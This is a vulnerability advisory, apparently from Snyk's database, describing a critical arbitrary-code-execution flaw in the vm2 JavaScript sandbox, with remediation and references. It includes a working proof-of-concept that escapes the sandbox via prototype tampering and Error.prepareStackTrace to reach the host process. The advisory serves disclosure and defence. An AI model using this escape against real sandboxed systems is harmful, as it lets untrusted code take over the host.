SNYK-JS-VM2-2990237
PUBLISHED
CVSS 9.800000190734863 CRITICAL
## Overview
[vm2](https://github.com/patriksimek/vm2#readme) is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
Affected versions of this package are vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the `WeakMap.prototype.set` method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise.
## PoC
```js
const { VM } = require('vm2');
new VM().run(`
const { set } = WeakMap.prototype;
WeakMap.prototype.set = function(v) {
return set.call(this, v, v);
};
Error.prepareStackTrace =
Error.prepareStackTrace =
(_, c) => c.map(c => c.getThis()).find(a => a);
const { stack } = new Error();
Error.prepareStackTrace = undefined;
stack.process.exit(1);
`);
// Never gets executed.
console.log('Finished');
```
## Remediation
Upgrade `vm2` to version 3.9.10 or higher.
## References
- [GitHub Commit](https://github.com/patriksimek/vm2/pull/445/commits/3a9876482be487b78a90ac459675da7f83f46d69)
- [GitHub Issue](https://github.com/patriksimek/vm2/issues/444)
- [GitHub PR](https://github.com/patriksimek/vm2/pull/445)
